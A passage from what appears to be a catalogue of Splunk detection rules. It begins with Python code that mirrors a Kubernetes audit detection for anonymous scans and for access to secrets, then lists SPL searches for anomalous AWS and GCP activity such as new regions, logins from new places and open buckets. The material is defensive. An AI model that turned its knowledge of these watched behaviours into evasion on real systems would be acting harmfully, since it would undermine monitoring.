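LOOPBACK = {"127.0.0.1", "::1"}
SENSITIVE_RESOURCES = {"secrets", "configmaps"}


def _src_ip(ev):
    """First hop of sourceIPs, the value the SPL reads as sourceIPs{}."""
    ips = ev.get("sourceIPs") or ["unknown"]
    return ips[0]


def is_pod_scan(ev):
    return (ev.get("user", {}).get("username") == "system:anonymous"
            and ev.get("verb") == "list"
            and ev.get("objectRef", {}).get("resource") == "pods"
            and ev.get("requestURI") == "/api/v1/pods")


def is_cluster_scan(ev):
    return (ev.get("user", {}).get("username") == "system:anonymous"
            and ev.get("userAgent") != "AWS Security Scanner")


def is_sensitive_access(ev):
    return (ev.get("objectRef", {}).get("resource") in SENSITIVE_RESOURCES
            and not any(ip in LOOPBACK for ip in ev.get("sourceIPs", [])))


def run_checks(events):
    """Group hits per check by (src_ip, username), mirroring the SPL `stats ... by` keys."""
    out = {"pod_scan": defaultdict(int), "cluster_scan": defaultdict(int),
           "sensitive_access": defaultdict(list)}
    for ev in events:
        key = (_src_ip(ev), ev.get("user", {}).get("username"))
        if is_pod_scan(ev):
            out["pod_scan"][key] += 1
        if is_cluster_scan(ev):
            out["cluster_scan"][key] += 1
        if is_sensitive_access(ev):
            o = ev["objectRef"]
            out["sensitive_access"][key].append(
                (o["resource"], o.get("namespace"), o.get("name"),
                 ev.get("annotations", {}).get("authorization.k8s.io/reason")))
    return out


if __name__ == "__main__":
    for name, table in run_checks(SAMPLE_AUDIT).items():
        print(name, dict(table))
```

A pod scan is also a cluster scan by construction, so the same anonymous source shows up in both tables; the authorization.k8s.io/reason annotation carried through for sensitive access is the RBAC decision, which is the user and object context the false-positive note above refers to.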

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudWatch EKS Logs inputs.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but request frequency, user agent, and source IPs will provide context.

Reference

Test Dataset

version: 1


Cloud api calls from previously unseen user roles

This search looks for cloud API commands not previously seen from each user role (assumed role).

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-09-04

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user, All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_api_calls_per_user_role user as user, command as command OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUserApiCall=min(firstTimeSeen) | where isnull(firstTimeSeenUserApiCall) OR firstTimeSeenUserApiCall > relative_time(now(),"-24h@h") | table firstTime, user, object, command |`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cloud_api_calls_from_previously_unseen_user_roles_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud API Calls Per User Role - Initial` to build the initial table of user roles, commands, and times. You must also enable the second baseline search `Previously Seen Cloud API Calls Per User Role - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `cloud_api_calls_from_previously_unseen_user_roles_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_api_calls_from_previously_unseen_user_roles_filter`

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives


Reference

Test Dataset


version: 1


Cloud compute instance created by previously unseen user

This search looks for cloud compute instances created by users who have not created them before.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change where All_Changes.action=created by All_Changes.user All_Changes.vendor_region | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_compute_creations_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime, user, dest, count vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_by_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must be ingesting the appropriate cloud-infrastructure logs. Run the "Previously Seen Cloud Compute Creations By User" support search to create a baseline of previously seen users.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a user will start to create compute instances for the first time, for any number of reasons. Verify with the user launching instances that this is the intended behavior.

Reference

Test Dataset


version: 1


Cloud compute instance created in previously unused region

This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1535
  • Last Updated: 2020-09-02

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region, All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions vendor_region as vendor_region OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), "-24h@h") | table firstTime, user, dest, count , vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_in_previously_unused_region_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Regions - Initial` to build the initial table of regions observed and times. You must also enable the second baseline search `Previously Seen Cloud Regions - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_in_previously_unused_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.

Reference

Test Dataset


version: 1


Cloud compute instance created with previously unseen image

This search looks for cloud compute instances being created with previously unseen image IDs.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK:
  • Last Updated: 2018-10-12

Search

| tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where image_id != "unknown" | lookup previously_seen_cloud_compute_images image_id as image_id OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenImage=min(firstTimeSeen) | where isnull(firstTimeSeenImage) OR firstTimeSeenImage > relative_time(now(), "-24h@h") | table firstTime, user, image_id, count, dest | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_image_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Images - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Images - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_image_filter` macro.

Required field

Kill Chain Phase

Known False Positives

After a new image is created, the first systems created with that image will cause this alert to fire. Verify that the image being used was created by a legitimate user.

Reference

Test Dataset


version: 1


Cloud compute instance created with previously unseen instance type

Find EC2 instances being created with previously unseen instance types.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK:
  • Last Updated: 2020-09-12

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where instance_type != "unknown" | lookup previously_seen_cloud_compute_instance_types instance_type as instance_type OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenInstanceType=min(firstTimeSeen) | where isnull(firstTimeSeenInstanceType) OR firstTimeSeenInstanceType > relative_time(now(), "-24h@h") | table firstTime, user, dest, count, instance_type | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_instance_type_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Instance Types - Initial` to build the initial table of instance types observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Instance Types - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_instance_type_filter` macro.

Required field

Kill Chain Phase

Known False Positives

It is possible that an admin will create a new system using a new instance type that has never been used before. Verify with the creator that they intended to create the system with the new instance type.

Reference

Test Dataset


version: 1


Cloud instance modified by previously unseen user

This search looks for cloud instances being modified by users who have not previously modified them.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-29

Search

| tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command) as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2 All_Changes.status=success by All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_instance_modifications_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime user command object_id count | `security_content_ctime(firstTime)` | `cloud_instance_modified_by_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

This search has a dependency on other searches to create and update a baseline of users observed to be associated with this activity. The search "Previously Seen Cloud Instance Modifications By User - Update" should be enabled for this detection to properly work.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen city

This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(City) | lookup previously_seen_cloud_provisioning_activity_sources City as City OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCity=min(firstTimeSeen) | where isnull(firstTimeSeenCity) OR firstTimeSeenCity > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, City, user, object, command | `cloud_provisioning_activity_from_previously_unseen_city_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_city_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so "false positive" means something slightly different here. Every time this fires, it accurately reflects the first occurrence in the time period you are searching within, plus what is stored in the cache feature. So while there are no "false positives" in the traditional sense, there is definitely a lot of noise.

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen country

This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Country) | lookup previously_seen_cloud_provisioning_activity_sources Country as Country OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCountry=min(firstTimeSeen) | where isnull(firstTimeSeenCountry) OR firstTimeSeenCountry > relative_time(now(), "-24h@h") | table firstTime, src, Country, user, object, command | `cloud_provisioning_activity_from_previously_unseen_country_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_country_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so "false positive" means something slightly different here. Every time this fires, it accurately reflects the first occurrence in the time period you are searching within, plus what is stored in the cache feature. So while there are no "false positives" in the traditional sense, there is definitely a lot of noise.

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen ip address

This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-08-16

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.command | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_provisioning_activity_sources src as src OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenSrc=min(firstTimeSeen) | where isnull(firstTimeSeenSrc) OR firstTimeSeenSrc > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, user, object_id, command | `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so "false positive" means something slightly different here. Every time this fires, it accurately reflects the first occurrence in the time period you are searching within, plus what is stored in the cache feature. So while there are no "false positives" in the traditional sense, there is definitely a lot of noise.

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen region

This search looks for cloud provisioning activities from previously unseen regions. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-08-16

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Region) | lookup previously_seen_cloud_provisioning_activity_sources Region as Region OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, Region, user, object, command | `cloud_provisioning_activity_from_previously_unseen_region_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so "false positive" means something slightly different here. Every time this fires, it accurately reflects the first occurrence in the time period you are searching within, plus what is stored in the cache feature. So while there are no "false positives" in the traditional sense, there is definitely a lot of noise.

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Detect aws console login by new user

This search looks for CloudTrail events in which a console login by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert fires if the user has logged into the console for the first time within the last hour.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2020-05-28

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)` | inputlookup append=t previously_seen_users_console_logins | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >=relative_time(now(),"-24h@h"), "First Time Logging into AWS Console", "Previously Seen User") |where userStatus="First Time Logging into AWS Console" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_console_login_by_new_user_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new city

This search looks for CloudTrail events in which a console login by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert fires if the user has logged into the console for the first time within the last hour.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user City | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user City | fields earliestseen user City] | eval userCity=if(firstTime >= relative_time(now(), "-24h@h"), "New City","Previously Seen City") | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "New User","Old User") | where userCity = "New City" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user City userStatus userCity | `detect_aws_console_login_by_user_from_new_city_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_city_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new country

This search looks for CloudTrail events in which a console login by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert fires if the user has logged into the console for the first time within the last hour.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user Country | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user Country | fields earliestseen user Country] | eval userCountry=if(firstTime >= relative_time(now(), "-24h@h"), "New Country","Previously Seen Country") | eval userStatus=if(earliestseen >= relative_time(now(),"-24h@h") OR isnull(earliestseen), "New User","Old User") | where userCountry = "New Country" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user Country userStatus userCountry | `detect_aws_console_login_by_user_from_new_country_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_country_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new region

This search looks for CloudTrail events in which a console login by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert fires if the user has logged into the console for the first time within the last hour.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user Region | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user Region | fields earliestseen user Region] | eval userRegion=if(firstTime >= relative_time(now(), "-24h@h"), "New Region","Previously Seen Region") | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "New User","Old User") | where userRegion = "New Region" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user Region userStatus userRegion | `detect_aws_console_login_by_user_from_new_region_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logs in for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect gcp storage access from a new ip

This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2020-08-10

Search

`google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri | rename cs_method_ as operation | search status="\"200\"" | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip operation request_uri | table firstTime, lastTime, bucket_name, remote_ip, operation, request_uri | inputlookup append=t previously_seen_gcp_storage_access_from_remote_ip.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip operation request_uri | outputlookup previously_seen_gcp_storage_access_from_remote_ip.csv | eval newIP=if(firstTime >= relative_time(now(),"-70m@m"), 1, 0) | where newIP=1 | eval first_time=strftime(firstTime,"%m/%d/%y %H:%M:%S") | eval last_time=strftime(lastTime,"%m/%d/%y %H:%M:%S") | table first_time last_time bucket_name remote_ip operation request_uri | `detect_gcp_storage_access_from_a_new_ip_filter`

Associated Analytic Story


How To Implement

This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview). In order to capture public GCP Storage Bucket access logs, you must also enable storage bucket logging to your PubSub Topic as per https://cloud.google.com/storage/docs/access-logs. These logs are deposited into the nominated Storage Bucket on an hourly basis and typically show up by 15 minutes past the hour. It is recommended to configure any saved searches or correlation searches in Enterprise Security to run on an hourly basis at 30 minutes past the hour (cron definition of 30 * * * *). A lookup table (previously_seen_gcp_storage_access_from_remote_ip.csv) stores the previously seen access requests, and is used by this search to determine any newly seen IP addresses accessing the Storage Buckets.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

GCP Storage buckets can be accessed from any IP (if the ACLs are open to allow it), as long as it can make a successful connection. Such access will be a false positive, since the search is simply looking for a new IP within the past two hours.

Reference

Test Dataset

version: 1


Detect new open gcp storage buckets

This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2020-08-05

Search

`google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions | spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action | spath output=user path=data.protoPayload.authenticationInfo.principalEmail | spath output=location path=data.protoPayload.resourceLocation.currentLocations{} | spath output=src path=data.protoPayload.requestMetadata.callerIp | spath output=bucketName path=data.protoPayload.resourceName | spath output=role path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.role | spath output=member path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.member | search (member=allUsers AND action=ADD) | table _time, bucketName, src, user, location, action, role, member | search `detect_new_open_gcp_storage_buckets_filter`

Associated Analytic Story


How To Implement

